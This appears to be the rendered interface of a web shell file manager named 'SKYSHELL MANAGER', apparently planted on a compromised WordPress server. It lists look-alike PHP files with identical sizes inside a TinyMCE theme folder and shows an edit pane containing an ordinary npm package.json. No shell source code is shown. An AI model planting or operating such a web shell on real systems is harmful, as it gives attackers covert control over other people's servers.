📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "_from": "expand-template@^2.0.3", "_id": "expand-template@2.0.3", "_inBundle": false, "_integrity": "sha512-XYfuKMvj4O35f/pOXLObndIRvyQ+/+6AhODh+OKWj9S9498pHHn/IMszH+gt0fBCRWMNfk1ZSp5x3AifmnI2vg==", "_location": "/@budibase/cli/expand-template", "_phantomChildren": {}, "_requested": { "type": "range", "registry": true, "raw": "expand-template@^2.0.3", "name": "expand-template", "escapedName": "expand-template", "rawSpec": "^2.0.3", "saveSpec": null, "fetchSpec": "^2.0.3" }, "_requiredBy": [ "/@budibase/cli/prebuild-install" ], "_resolved": "https://registry.npmjs.org/expand-template/-/expand-template-2.0.3.tgz", "_shasum": "6e14b3fcee0f3a6340ecb57d2e8918692052a47c", "_spec": "expand-template@^2.0.3", "_where": "/usr/local/lib/node_modules/@budibase/cli/node_modules/prebuild-install", "author": { "name": "LM", "email": "ralphtheninja@riseup.net" }, "bugs": { "url": "https://github.com/ralphtheninja/expand-template/issues" }, "bundleDependencies": false, "dependencies": {}, "deprecated": false, "description": "Expand placeholders in a template string", "devDependencies": { "standard": "^12.0.0", "tape": "^4.2.2" }, "engines": { "node": ">=6" }, "homepage": "https://github.com/ralphtheninja/expand-template", "keywords": [ "template", "expand", "replace" ], "license": "(MIT OR WTFPL)", "main": "index.js", "name": "expand-template", "repository": { "type": "git", "url": "git+https://github.com/ralphtheninja/expand-template.git" }, "scripts": { "test": "tape test.js && standard" }, "version": "2.0.3" }
Save